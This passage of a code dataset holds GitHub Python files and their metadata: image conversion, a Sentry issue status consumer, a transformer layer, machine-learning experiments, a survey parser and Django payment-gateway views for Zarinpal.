str(xopp_page_width))\r\n img_xml.set(\"bottom\", str(xopp_page_height))\r\n \r\n # convert the current page to a base 64 encoded PNG image\r\n \r\n # downscale the image to a given maximum\r\n if not max_width: max_width = page.size[0]\r\n if not max_height: max_height = page.size[1]\r\n page.thumbnail((max_width, max_height))\r\n \r\n bytes_buffer = BytesIO()\r\n page.save(bytes_buffer, format=\"PNG\")\r\n img_xml.text = base64.b64encode(bytes_buffer.getvalue()).decode()\r\n\r\n \r\n # Saving the xml file gzipped with the extension xopp\r\n tree = gfg.ElementTree(root) # An element tree that can write bytes to files\r\n with gzip.open(xopp_path, \"wb\") as output_file:\r\n tree.write(output_file)","repo_name":"OsiPog/school-tool","sub_path":"src/tools/pil2xopp.py","file_name":"pil2xopp.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21392238142","text":"import os\nfrom PIL import Image\n\ndef get_image(count):\n scp_command = 'scp pi@192.168.2.5:Desktop/gregTest.jpg ' + 'images/' + str(count) + '.jpg'\n os.system(scp_command)\n return\n\t# os.system('scp pi@192.168.2.5:Desktop/gregTest.jpg gregTest.jpg')\n #use following to create key if needed: https://www.raspberrypi.org/documentation/remote-access/ssh/passwordless.md\n\ndef valid_image(path):\n\ttry:\n\t\tImage.open(path)\n\texcept IOError:\n\t\treturn False\n\treturn True\n","repo_name":"Garner412/RaspberryDrive","sub_path":"get_images_from_pi.py","file_name":"get_images_from_pi.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"92"} +{"seq_id":"40519076953","text":"from __future__ import annotations\n\nimport logging\nfrom collections import defaultdict\nfrom typing import Any, Iterable, Mapping, Sequence, Tuple\n\nfrom sentry_sdk.tracing import NoOpSpan, Transaction\n\nfrom sentry import features\nfrom sentry.issues.status_change_message import StatusChangeMessageData\nfrom sentry.models.group import Group, GroupStatus\nfrom sentry.models.grouphash import GroupHash\nfrom sentry.models.organization import Organization\nfrom sentry.models.project import Project\nfrom sentry.types.activity import ActivityType\nfrom sentry.types.group import IGNORED_SUBSTATUS_CHOICES, GroupSubStatus\nfrom sentry.utils import metrics\n\nlogger = logging.getLogger(__name__)\n\n\ndef update_status(group: Group, status_change: StatusChangeMessageData) -> None:\n new_status = status_change[\"new_status\"]\n new_substatus = status_change[\"new_substatus\"]\n\n if group.status == new_status and group.substatus == new_substatus:\n return\n\n log_extra = {\n \"project_id\": status_change[\"project_id\"],\n \"fingerprint\": status_change[\"fingerprint\"],\n \"new_status\": new_status,\n \"new_substatus\": new_substatus,\n }\n\n # Validate the provided status and substatus - we only allow setting a substatus for unresolved or ignored groups.\n if new_status in [GroupStatus.UNRESOLVED, GroupStatus.IGNORED]:\n if new_substatus is None:\n logger.error(\n \"group.update_status.missing_substatus\",\n extra={**log_extra},\n )\n return\n else:\n if new_substatus is not None:\n logger.error(\n \"group.update_status.unexpected_substatus\",\n extra={**log_extra},\n )\n return\n\n if new_status == GroupStatus.RESOLVED:\n Group.objects.update_group_status(\n groups=[group],\n status=new_status,\n substatus=new_substatus,\n activity_type=ActivityType.SET_RESOLVED,\n )\n elif new_status == GroupStatus.IGNORED:\n # The IGNORED status supports 3 substatuses. For UNTIL_ESCALATING and\n # UNTIL_CONDITION_MET, we expect the caller to monitor the conditions/escalating\n # logic and call the API with the new status when the conditions change.\n if new_substatus not in IGNORED_SUBSTATUS_CHOICES:\n logger.error(\n \"group.update_status.invalid_substatus\",\n extra={**log_extra},\n )\n return\n\n Group.objects.update_group_status(\n groups=[group],\n status=new_status,\n substatus=new_substatus,\n activity_type=ActivityType.SET_IGNORED,\n )\n elif new_status == GroupStatus.UNRESOLVED:\n activity_type = None\n if new_substatus == GroupSubStatus.ESCALATING:\n activity_type = ActivityType.SET_ESCALATING\n elif new_substatus == GroupSubStatus.REGRESSED:\n activity_type = ActivityType.SET_REGRESSION\n elif new_substatus == GroupSubStatus.ONGOING:\n activity_type = ActivityType.SET_UNRESOLVED\n\n # We don't support setting the UNRESOLVED status with substatus NEW as it\n # is automatically set on creation. All other issues should be set to ONGOING.\n if activity_type is None:\n logger.error(\n \"group.update_status.invalid_substatus\",\n extra={**log_extra},\n )\n return\n\n Group.objects.update_group_status(\n groups=[group],\n status=new_status,\n substatus=new_substatus,\n activity_type=activity_type,\n )\n else:\n logger.error(\n \"group.update_status.unsupported_status\",\n extra={**log_extra},\n )\n raise NotImplementedError(\n f\"Unsupported status: {status_change['new_status']} {status_change['new_substatus']}\"\n )\n\n\ndef bulk_get_groups_from_fingerprints(\n project_fingerprint_pairs: Iterable[Tuple[int, Sequence[str]]]\n) -> dict[Tuple[int, str], Group]:\n \"\"\"\n Returns a map of (project, fingerprint) to the group.\n\n Note that fingerprints for issue platform are expected to be\n processed via `process_occurrence_data` prior to calling this function.\n \"\"\"\n fingerprints_by_project: dict[int, list[str]] = defaultdict(list)\n for project_id, fingerprints in project_fingerprint_pairs:\n fingerprints_by_project[project_id].append(fingerprints[0])\n\n query = GroupHash.objects.none()\n for project_id, fingerprints in fingerprints_by_project.items():\n query = query.union(\n GroupHash.objects.filter(\n project=project_id,\n hash__in=fingerprints,\n ).select_related(\"group\")\n )\n\n result: dict[Tuple[int, str], Group] = {\n (grouphash.project_id, grouphash.hash): grouphash.group for grouphash in query\n }\n\n found_fingerprints = set(result.keys())\n fingerprints_set = {\n (project_id, fingerprint[0]) for project_id, fingerprint in project_fingerprint_pairs\n }\n for project_id, fingerprint in fingerprints_set - found_fingerprints:\n logger.error(\n \"grouphash.not_found\",\n extra={\n \"project_id\": project_id,\n \"fingerprint\": fingerprint,\n },\n )\n\n return result\n\n\ndef _get_status_change_kwargs(payload: Mapping[str, Any]) -> Mapping[str, Any]:\n \"\"\"\n Processes the incoming message payload into a format we can use.\n \"\"\"\n from sentry.issues.ingest import process_occurrence_data\n\n data = {\n \"fingerprint\": payload[\"fingerprint\"],\n \"project_id\": payload[\"project_id\"],\n \"new_status\": payload[\"new_status\"],\n \"new_substatus\": payload.get(\"new_substatus\", None),\n }\n\n process_occurrence_data(data)\n return {\"status_change\": data}\n\n\ndef process_status_change_message(\n message: Mapping[str, Any], txn: Transaction | NoOpSpan\n) -> Group | None:\n with metrics.timer(\"occurrence_consumer._process_message.status_change._get_kwargs\"):\n kwargs = _get_status_change_kwargs(message)\n status_change_data = kwargs[\"status_change\"]\n\n metrics.incr(\n \"occurrence_ingest.status_change.messages\",\n sample_rate=1.0,\n tags={\"new_status\": status_change_data[\"new_status\"]},\n )\n txn.set_tag(\"new_status\", status_change_data[\"new_status\"])\n\n project = Project.objects.get_from_cache(id=status_change_data[\"project_id\"])\n organization = Organization.objects.get_from_cache(id=project.organization_id)\n\n txn.set_tag(\"organization_id\", organization.id)\n txn.set_tag(\"organization_slug\", organization.slug)\n txn.set_tag(\"project_id\", project.id)\n txn.set_tag(\"project_slug\", project.slug)\n\n if not features.has(\"organizations:issue-platform-api-crons-sd\", organization):\n metrics.incr(\n \"occurrence_ingest.status_change.dropped_feature_disabled\",\n sample_rate=1.0,\n )\n txn.set_tag(\"result\", \"dropped_feature_disabled\")\n return None\n\n with metrics.timer(\"occurrence_consumer._process_message.status_change.get_group\"):\n fingerprint = status_change_data[\"fingerprint\"]\n groups_by_fingerprints = bulk_get_groups_from_fingerprints([(project.id, fingerprint)])\n group = groups_by_fingerprints.get((project.id, fingerprint[0]), None)\n if not group:\n metrics.incr(\n \"occurrence_ingest.status_change.dropped_group_not_found\",\n sample_rate=1.0,\n )\n return None\n txn.set_tag(\"group_id\", group.id)\n\n with metrics.timer(\"occurrence_consumer._process_message.status_change.update_group_status\"):\n update_status(group, status_change_data)\n\n return group\n","repo_name":"getsentry/sentry","sub_path":"src/sentry/issues/status_change_consumer.py","file_name":"status_change_consumer.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","stars":35611,"dataset":"github-code","pt":"92"} +{"seq_id":"2909178297","text":"import pymysql\n\nfrom bili import data_all\n\n\n\ndata = data_all()\n\n# 1. 连接数据库\nconn = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='12345678', db='day80')\ncursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n\n# 2. 发送指令\nfor up_list in data:\n if up_list:\n for item in up_list:\n author = item[0]\n title = item[1]\n href = item[2]\n created = item[3]\n cursor.execute('select * from bili where href = %s', [href, ])\n if not cursor.fetchone():\n sql = 'insert into bili(author, title, href, created) values (%s, %s, %s, %s)'\n cursor.execute(sql, [author, title, href, created])\n conn.commit()\n\nsql1 = 'select * from bili order by author asc'\ncursor.execute(sql1)\ndata_list = cursor.fetchall()\ncontents = {\n 'data_list': data_list\n}\nprint(contents)\n# 3. 关闭连接\ncursor.close()\nconn.close()","repo_name":"iiweixiao/pythoncode","sub_path":"day82/Django82/Django82/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19716413869","text":"import copy\nimport warnings\n\nimport torch\nfrom mmcv.cnn import build_norm_layer\nfrom mmcv.cnn.bricks.transformer import (build_attention,\n build_feedforward_network)\nfrom mmengine.config import ConfigDict\nfrom mmengine.model import BaseModule, ModuleList\nfrom mmengine.registry import MODELS\n\n\n@MODELS.register_module()\nclass TPVFormerLayer(BaseModule):\n \"\"\"Base `TPVFormerLayer` for vision transformer.\n\n It can be built from `mmcv.ConfigDict` and support more flexible\n customization, for example, using any number of `FFN or LN ` and\n use different kinds of `attention` by specifying a list of `ConfigDict`\n named `attn_cfgs`. It is worth mentioning that it supports `prenorm`\n when you specifying `norm` as the first element of `operation_order`.\n More details about the `prenorm`: `On Layer Normalization in the\n Transformer Architecture `_ .\n Args:\n attn_cfgs (list[`mmcv.ConfigDict`] | obj:`mmcv.ConfigDict` | None )):\n Configs for `self_attention` or `cross_attention` modules,\n The order of the configs in the list should be consistent with\n corresponding attentions in operation_order.\n If it is a dict, all of the attention modules in operation_order\n will be built with this config. Default: None.\n ffn_cfgs (list[`mmcv.ConfigDict`] | obj:`mmcv.ConfigDict` | None )):\n Configs for FFN, The order of the configs in the list should be\n consistent with corresponding ffn in operation_order.\n If it is a dict, all of the attention modules in operation_order\n will be built with this config.\n operation_order (tuple[str]): The execution order of operation\n in transformer. Such as ('self_attn', 'norm', 'ffn', 'norm').\n Support `prenorm` when you specifying first element as `norm`.\n Default: None.\n norm_cfg (dict): Config dict for normalization layer.\n Default: dict(type='LN').\n init_cfg (obj:`mmcv.ConfigDict`): The Config for initialization.\n Default: None.\n batch_first (bool): Key, Query and Value are shape\n of (batch, n, embed_dim)\n or (n, batch, embed_dim). Default to False.\n \"\"\"\n\n def __init__(self,\n attn_cfgs=None,\n ffn_cfgs=dict(\n type='FFN',\n feedforward_channels=1024,\n num_fcs=2,\n ffn_drop=0.,\n act_cfg=dict(type='ReLU', inplace=True),\n ),\n operation_order=None,\n norm_cfg=dict(type='LN'),\n init_cfg=None,\n batch_first=True,\n **kwargs):\n deprecated_args = dict(\n feedforward_channels='feedforward_channels',\n ffn_dropout='ffn_drop',\n ffn_num_fcs='num_fcs')\n for ori_name, new_name in deprecated_args.items():\n if ori_name in kwargs:\n warnings.warn(\n f'The arguments `{ori_name}` in BaseTransformerLayer '\n f'has been deprecated, now you should set `{new_name}` '\n f'and other FFN related arguments '\n f'to a dict named `ffn_cfgs`. ')\n ffn_cfgs[new_name] = kwargs[ori_name]\n\n super().__init__(init_cfg)\n\n self.batch_first = batch_first\n\n num_attn = operation_order.count('self_attn') + operation_order.count(\n 'cross_attn')\n if isinstance(attn_cfgs, dict):\n attn_cfgs = [copy.deepcopy(attn_cfgs) for _ in range(num_attn)]\n else:\n assert num_attn == len(attn_cfgs), f'The length ' \\\n f'of attn_cfg {num_attn} is ' \\\n f'not consistent with the number of attention' \\\n f'in operation_order {operation_order}.'\n\n self.num_attn = num_attn\n self.operation_order = operation_order\n self.norm_cfg = norm_cfg\n self.pre_norm = operation_order[0] == 'norm'\n self.attentions = ModuleList()\n\n index = 0\n for operation_name in operation_order:\n if operation_name in ['self_attn', 'cross_attn']:\n if 'batch_first' in attn_cfgs[index]:\n assert self.batch_first == attn_cfgs[index]['batch_first']\n else:\n attn_cfgs[index]['batch_first'] = self.batch_first\n attention = build_attention(attn_cfgs[index])\n # Some custom attentions used as `self_attn`\n # or `cross_attn` can have different behavior.\n attention.operation_name = operation_name\n self.attentions.append(attention)\n index += 1\n\n self.embed_dims = self.attentions[0].embed_dims\n\n self.ffns = ModuleList()\n num_ffns = operation_order.count('ffn')\n if isinstance(ffn_cfgs, dict):\n ffn_cfgs = ConfigDict(ffn_cfgs)\n if isinstance(ffn_cfgs, dict):\n ffn_cfgs = [copy.deepcopy(ffn_cfgs) for _ in range(num_ffns)]\n assert len(ffn_cfgs) == num_ffns\n for ffn_index in range(num_ffns):\n if 'embed_dims' not in ffn_cfgs[ffn_index]:\n ffn_cfgs[ffn_index]['embed_dims'] = self.embed_dims\n else:\n assert ffn_cfgs[ffn_index]['embed_dims'] == self.embed_dims\n\n self.ffns.append(build_feedforward_network(ffn_cfgs[ffn_index]))\n\n self.norms = ModuleList()\n num_norms = operation_order.count('norm')\n for _ in range(num_norms):\n self.norms.append(build_norm_layer(norm_cfg, self.embed_dims)[1])\n\n def forward(self,\n query,\n key=None,\n value=None,\n tpv_pos=None,\n ref_2d=None,\n tpv_h=None,\n tpv_w=None,\n tpv_z=None,\n reference_points_cams=None,\n tpv_masks=None,\n spatial_shapes=None,\n level_start_index=None,\n **kwargs):\n \"\"\"\n **kwargs contains some specific arguments of attentions.\n\n Args:\n query (Tensor): The input query with shape\n [num_queries, bs, embed_dims] if\n self.batch_first is False, else\n [bs, num_queries embed_dims].\n key (Tensor): The key tensor with shape [num_keys, bs,\n embed_dims] if self.batch_first is False, else\n [bs, num_keys, embed_dims] .\n value (Tensor): The value tensor with same shape as `key`.\n tpv_pos (Tensor): The positional encoding for self attn.\n Returns:\n Tensor: forwarded results with shape\n [[bs, num_queries, embed_dims] * 3] for 3 tpv planes.\n \"\"\"\n\n norm_index = 0\n attn_index = 0\n ffn_index = 0\n if self.operation_order[0] == 'cross_attn':\n query = torch.cat(query, dim=1)\n identity = query\n\n for layer in self.operation_order:\n # cross view hybrid-attention\n if layer == 'self_attn':\n ss = torch.tensor(\n [[tpv_h, tpv_w], [tpv_z, tpv_h], [tpv_w, tpv_z]],\n device=query[0].device)\n lsi = torch.tensor(\n [0, tpv_h * tpv_w, tpv_h * tpv_w + tpv_z * tpv_h],\n device=query[0].device)\n\n if not isinstance(query, (list, tuple)):\n query = torch.split(\n query, [tpv_h * tpv_w, tpv_z * tpv_h, tpv_w * tpv_z],\n dim=1)\n\n query = self.attentions[attn_index](\n query,\n identity if self.pre_norm else None,\n query_pos=tpv_pos,\n reference_points=ref_2d,\n spatial_shapes=ss,\n level_start_index=lsi,\n **kwargs)\n attn_index += 1\n query = torch.cat(query, dim=1)\n identity = query\n\n elif layer == 'norm':\n query = self.norms[norm_index](query)\n norm_index += 1\n\n # image cross attention\n elif layer == 'cross_attn':\n query = self.attentions[attn_index](\n query,\n key,\n value,\n identity if self.pre_norm else None,\n reference_points_cams=reference_points_cams,\n tpv_masks=tpv_masks,\n spatial_shapes=spatial_shapes,\n level_start_index=level_start_index,\n **kwargs)\n attn_index += 1\n identity = query\n\n elif layer == 'ffn':\n query = self.ffns[ffn_index](\n query, identity if self.pre_norm else None)\n ffn_index += 1\n query = torch.split(\n query, [tpv_h * tpv_w, tpv_z * tpv_h, tpv_w * tpv_z], dim=1)\n return query\n","repo_name":"open-mmlab/mmdetection3d","sub_path":"projects/TPVFormer/tpvformer/tpvformer_layer.py","file_name":"tpvformer_layer.py","file_ext":"py","file_size_in_byte":9192,"program_lang":"python","lang":"en","doc_type":"code","stars":4289,"dataset":"github-code","pt":"92"} +{"seq_id":"21369050511","text":"import pandas as pd\n\nimport torch.multiprocessing as mp\nfrom functools import partial\n\nfrom data.dynamic import preprocess\nfrom models.mlp import run_mlp_regression\nfrom tqdm import tqdm\nfrom .utils import generate_random_combinations\nfrom .fixed import search_run_fixed\n\ndef search_task_list(args, logger, run_func, task_list):\n # wrapper for easier mp\n return (task_list, search_run_fixed(args, logger, run_func, task_list))\n\ndef search_random(args, logger, run_func):\n\n df = pd.read_csv(args.full_file, index_col=False)\n subtasks = list(df[\"subtask\"].unique())\n\n candidate_task_lists = generate_random_combinations(subtasks, args.search_budget, args.search_n_trials)\n\n df = pd.DataFrame(columns=[\"id\", \"dev_r2\", \"selected_tasks\"])\n best_r2, best_task_list = -1e10, None\n\n if args.search_n_jobs > 1:\n pool = mp.Pool(processes=args.search_n_jobs)\n\n # for i, task_list in enumerate(candidate_task_lists):\n # results.append(pool.apply_async(search_task_list. args=(args, logger, run_func, task_list)))\n search_func = partial(search_task_list, args, logger, run_func)\n results = pool.imap(search_func, candidate_task_lists)\n\n for i, result in enumerate(results):\n task_list, dev_r2 = result\n df.loc[len(df.index)] = [i, dev_r2, task_list]\n\n if dev_r2 > best_r2:\n best_r2 = dev_r2\n best_task_list = task_list\n else:\n\n for i, task_list in tqdm(enumerate(candidate_task_lists)):\n \n dev_r2 = search_run_fixed(args, logger, run_func, task_list)\n df.loc[len(df.index)] = [i, dev_r2, task_list]\n\n logger.info(\"Run {}, Dev R2 = {}\".format(i, dev_r2))\n\n if dev_r2 > best_r2:\n best_r2 = dev_r2\n best_task_list = task_list\n \n logger.info(\"Best Dev R2: {}\".format(best_r2))\n logger.info(\"Best list of tasks: {}\".format(best_task_list))\n \n return best_r2, best_task_list, df\n","repo_name":"INK-USC/predicting-big-bench","sub_path":"code/search/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"28218271851","text":"from .models import *\n\ndef json_parser_survey_standard(survey):\n \"\"\"\n parse survey standard definition from json dictionnary\n \"\"\"\n ss = StandardSurvey(survey['name'])\n if 'comment' in survey:\n ss.comment = json_parser_comment(survey['comment'])\n index = 1\n for qDef in survey['questions']:\n q = json_parser_question(qDef)\n q.order = index\n ss.add_question(q)\n index = index + 1\n return ss\n\ndef json_parser_comment(json):\n if isinstance(json, str):\n return [json]\n return json\n\ndef json_parser_description(json):\n if isinstance(json, str):\n return [json]\n return json\n\ndef import_attr(obj, data, keys):\n for key in keys:\n if key in data:\n setattr(obj, key, data[key])\n\ndef json_parser_question(json):\n \"\"\"\n question definition from json dictionnary\n \"\"\"\n data_name = json['data_name']\n\n q = StandardQuestion(data_name, json['type'], json['title'])\n \n if 'description' in json:\n q.description = json_parser_description(json['description'])\n \n if 'mandatory' in json:\n q.mandatory = json['mandatory']\n \n if 'comment' in json:\n q.comment = json_parser_comment(json['comment'])\n\n import_attr(q, json, ['active','data_type', 'format','rules', 'added_at', 'removed_at', 'platforms', 'target'])\n\n if 'possible_responses' in json:\n index = 1\n for key, rDef in json['possible_responses'].items():\n try:\n r = json_parser_response(key, rDef, index)\n except Exception as e:\n raise StandardParserException(\"Error in %s/%s : %s \" % (data_name, key, e))\n q.add_response(r)\n index = index + 1\n\n if 'rows' in json:\n q.rows = json_parser_matrix_dim(json['rows'])\n\n if 'columns' in json:\n q.columns = json_parser_matrix_dim(json['columns'])\n\n return q\n\ndef json_parser_response(key, json, index):\n \n if not 'text' in json:\n raise StandardParserException(\"Missing 'text' field\")\n \n r = StandardResponse(key, json['text'], index)\n \n import_attr(r, json, ['added_at', 'removed_at', 'platforms'])\n\n if 'value' in json:\n r.value = json['value']\n \n if 'description' in json:\n r.description = json_parser_description(json['description'])\n \n if 'comment' in json:\n r.comment = json_parser_comment(json['comment'])\n\n return r\n\ndef json_parser_matrix_dim(json):\n rr = StandardMatrixDimensionList()\n index = 1\n for key, d in json.items():\n #print(key, d)\n m = StandardMatrixDimension(d['text'], key, d['value'], index)\n rr[key] = m\n index = index + 1\n return rr","repo_name":"influenzanet/python-influenzanet-surveys","sub_path":"influenzanet/surveys/standard/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"8115641093","text":"from __future__ import print_function\nfrom ikrlib import png2fea\nimport numpy as np\nfrom time import time\nfrom sklearn.decomposition import PCA\nfrom sklearn.neural_network import MLPClassifier\n\n\ntrain_persons = []\ntrain_persons_classes = []\nfor number in range(1, 32):\n train_person = png2fea('train/' + str(number) + '/').values()\n train_persons.extend(train_person)\n train_persons_classes.extend([number] *len(train_person))\n #train_persons[number-1] = np.vstack(train_persons[number-1])\n\nfor number in range(1, 32):\n train_person = png2fea('dev/' + str(number) + '/').values()\n train_persons.extend(train_person)\n train_persons_classes.extend([number] *len(train_person))\n #train_persons[number-1] = np.vstack(train_persons[number-1])\n\ntest_persons = []\ntest_filenames = []\ntst = png2fea('eval/')\ntest_filenames.extend(tst.keys())\ntest_person = tst.values()\ntest_persons.extend(test_person)\n#train_persons[number-1] = np.vstack(train_persons[number-1])\n\nw = 80\nh = 80\n\ntrain_persons = np.array(train_persons)\ndim = train_persons.shape[1]\nprint(\"Total dataset size:\")\nprint(\"n_samples: %d\" % len(train_persons))\nprint(\"n_features: %d\" % dim)\nprint(\"n_classes: %d\" % 31)\n\n# #############################################################################\n# Compute a PCA (eigenfaces) on the face dataset (treated as unlabeled\n# dataset): unsupervised feature extraction / dimensionality reduction\nn_components = 64\n\nprint(\"Extracting the top %d eigenfaces from %d faces\"\n % (n_components, train_persons.shape[0]))\nt0 = time()\npca = PCA(n_components=n_components, svd_solver='randomized',\n whiten=True).fit(train_persons)\nprint(\"done in %0.3fs\" % (time() - t0))\n\neigenfaces = pca.components_.reshape((n_components, h, w))\n\nprint(\"Projecting the input data on the eigenfaces orthonormal basis\")\nt0 = time()\ntrain_persons_pca = pca.transform(train_persons)\ntest_persons_pca = pca.transform(test_persons)\nprint(\"done in %0.3fs\" % (time() - t0))\n\n\n# #############################################################################\n# Train a SVM classification model\n\nprint(\"Fitting the classifier to the training set\")\nt0 = time()\nparam_grid = {'C': [1e3, 5e3, 1e4, 5e4, 1e5],\n 'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1], }\n#clf = GridSearchCV(SVC(kernel='rbf', class_weight='balanced',probability=True), param_grid, cv=5)\nclf = MLPClassifier(hidden_layer_sizes=(800,), activation='logistic', learning_rate='adaptive', alpha=1e-4,\n max_iter=1000, random_state=1)\n\n\nclf = clf.fit(train_persons_pca, train_persons_classes)\nprint(\"done in %0.3fs\" % (time() - t0))\nprint(\"Best estimator found by grid search:\")\n#print(clf.best_estimator_)\n\n\n# #############################################################################\n# Quantitative evaluation of the model quality on the test set\n\nprint(\"Predicting people's names on the test set\")\nt0 = time()\n\n#test_classes_Predictions = clf.predict(test_persons_pca)\ntest_classes_Predictions = clf.predict_log_proba(test_persons_pca)\nprint(\"done in %0.3fs\" % (time() - t0))\n\nwith open(\"image_NN\", \"w\") as f:\n for file, probab in zip(test_filenames, test_classes_Predictions):\n file = file.split('/')[1][:-4]\n hard_decision = 1 + np.argmax(probab)\n f.write(\"{0} {1} {2}\\n\".format(file, hard_decision, ' '.join([str(x) for x in probab.tolist()])))\n\n","repo_name":"nikopatrik/IKR","sub_path":"image_neural_network.py","file_name":"image_neural_network.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36353442654","text":"from django.utils import timezone\r\nfrom payment_stripe.models import Payment \r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import redirect\r\nfrom django.shortcuts import render, get_object_or_404\r\nimport requests\r\nfrom django.urls import reverse_lazy\r\nimport json\r\nfrom django.urls import reverse\r\n\r\nfrom paypal.standard.ipn.signals import valid_ipn_received\r\nfrom django.dispatch import receiver\r\nfrom django.db.models.signals import post_save\r\n\r\nfrom payment_stripe.models import InternationalOrder\r\n\r\nfrom ivc_project.email_sender import send_new_email\r\nfrom ivc_project.settings import EMAIL_HOST_USER\r\nfrom django.core.mail import EmailMultiAlternatives\r\nfrom django.template.loader import render_to_string\r\nfrom accounting.views import invoice_pay\r\n\r\n\r\ndef request_amount(request, pk):\r\n obj_pay = get_object_or_404(Payment, pk=pk)\r\n global amount\r\n if request.method == 'POST':\r\n print('pooooooooooooooooooooost')\r\n print('pooooooooooooooooooooost')\r\n print('pooooooooooooooooooooost')\r\n # amount = 11000 # Rial / Required\r\n amount = obj_pay.total\r\n print(amount)\r\n print(amount)\r\n print(amount)\r\n print(amount)\r\n return redirect(\"zarinpal:request\")\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef send_request(request, pk):\r\n obj_pay = get_object_or_404(Payment, pk=pk)\r\n if obj_pay.total == 0:\r\n obj_pay.user.memberprofile.balance += obj_pay.zarinpal_amount\r\n obj_pay.invoice.is_paid\r\n obj_pay.user.memberprofile.save()\r\n obj_pay.paymented += 1\r\n obj_pay.success_date = timezone.now()\r\n obj_pay.save()\r\n invoice_pay(obj_pay.invoice.id)\r\n return redirect('accounting:invoice-detail', pk=obj_pay.invoice.id)\r\n\r\n MERCHANT = '4e843bef-6b60-4cd0-b85a-ae2d89147c9c'\r\n ZP_API_REQUEST = \"https://api.zarinpal.com/pg/v4/payment/request.json\"\r\n ZP_API_VERIFY = \"https://api.zarinpal.com/pg/v4/payment/verify.json\"\r\n ZP_API_STARTPAY = \"https://www.zarinpal.com/pg/StartPay/{authority}\"\r\n\r\n \r\n amount = obj_pay.total # Rial / Required\r\n description = \"توضیحات مربوط به تراکنش را در این قسمت وارد کنید\" # Required\r\n # email = 'email@example.com' # Optional\r\n # mobile = '09123456789' # Optional\r\n # Important: need to edit for realy server.\r\n\r\n # CallbackURL = 'http://127.0.0.1:8000/verify/'\r\n\r\n CallbackURL = str(reverse('zarinpal:verify', args=[obj_pay.pk]))\r\n CallbackURL = 'http://tecvico.com' + CallbackURL\r\n\r\n\r\n req_data = {\r\n \"merchant_id\": MERCHANT,\r\n \"amount\": amount,\r\n \"callback_url\": CallbackURL,\r\n \"description\": description,\r\n \"metadata\": {\"mobile\": request.user.memberprofile.phone, \"email\": request.user.email}\r\n }\r\n\r\n req_header = {\"accept\": \"application/json\",\r\n \"content-type\": \"application/json'\"}\r\n req = requests.post(url=ZP_API_REQUEST, data=json.dumps(\r\n req_data), headers=req_header)\r\n \r\n authority = req.json()['data']['authority']\r\n if len(req.json()['errors']) == 0:\r\n obj_pay.merchant=MERCHANT\r\n obj_pay.save()\r\n return redirect(ZP_API_STARTPAY.format(authority=authority))\r\n else:\r\n e_code = req.json()['errors']['code']\r\n e_message = req.json()['errors']['message']\r\n return HttpResponse(f\"Error code: {e_code}, Error Message: {e_message}\")\r\n \r\n\r\n\r\ndef verify(request, pk):\r\n obj_pay = get_object_or_404(Payment, pk=pk)\r\n payment_url = obj_pay.back_url\r\n\r\n t_status = request.GET.get('Status')\r\n t_authority = request.GET['Authority']\r\n if request.GET.get('Status') == 'OK':\r\n req_header = {\"accept\": \"application/json\",\r\n \"content-type\": \"application/json'\"}\r\n req_data = {\r\n \"merchant_id\": '4e843bef-6b60-4cd0-b85a-ae2d89147c9c',\r\n \"amount\": obj_pay.total,\r\n \"authority\": t_authority\r\n }\r\n req = requests.post(url=\"https://api.zarinpal.com/pg/v4/payment/verify.json\", data=json.dumps(req_data), headers=req_header)\r\n if len(req.json()['errors']) == 0:\r\n t_status = req.json()['data']['code']\r\n if t_status == 100:\r\n\r\n obj_pay.invoice.is_paid\r\n obj_pay.paymented += 1\r\n obj_pay.success_date = timezone.now()\r\n obj_pay.merchant=\"4e843bef-6b60-4cd0-b85a-ae2d89147c9c\"\r\n obj_pay.save()\r\n\r\n context = {\r\n 'invoice': obj_pay,\r\n 'RefID': str(req.json()['data']['ref_id']),\r\n 'payment_url':payment_url\r\n }\r\n\r\n context_email = {\r\n 'obj_pay': obj_pay,\r\n 'RefID': str(req.json()['data']['ref_id'])\r\n }\r\n html_body = render_to_string(\"payment_stripe/inv-email.html\", context_email)\r\n e_subject = \"TECVICO\"\r\n #e_content = \"Dear {user}\\nHi\\nHope you are going well.\\nYou paid {cost} at {date}\\n{intent} \\nDo not reply to this Email. If you have any questions or concerns, please feel free to contact the company:\\nEmail: payment@tecvico.com\\n\\nThank you.\\n\\nBest regards\\n\\n\".format(user = instance.user, cost = instance.purchased_amount, date = instance.date_created, intent = instance.payment_intent)\r\n e_content = \"\"\r\n e_destination = obj_pay.user.email\r\n msg = EmailMultiAlternatives(subject=e_subject, from_email=EMAIL_HOST_USER,to=[e_destination], body=e_content)\r\n msg.attach_alternative(html_body, \"text/html\")\r\n msg.send()\r\n\r\n invoice_pay(obj_pay.invoice.id)\r\n return redirect('accounting:invoice-detail', pk=obj_pay.invoice.id)\r\n\r\n\r\n return render(request, 'payment_stripe/inv.html', context)\r\n\r\n elif t_status == 101:\r\n return HttpResponse('Transaction submitted : ' + str(\r\n req.json()['data']['message']\r\n ))\r\n else:\r\n return HttpResponse('Transaction failed.\\nStatus: ' + str(\r\n req.json()['data']['message']\r\n ))\r\n else:\r\n e_code = req.json()['errors']['code']\r\n e_message = req.json()['errors']['message']\r\n return HttpResponse(f\"Error code: {e_code}, Error Message: {e_message}\")\r\n else:\r\n return HttpResponse('Transaction failed or canceled by user')\r\n\r\n# def success(request, 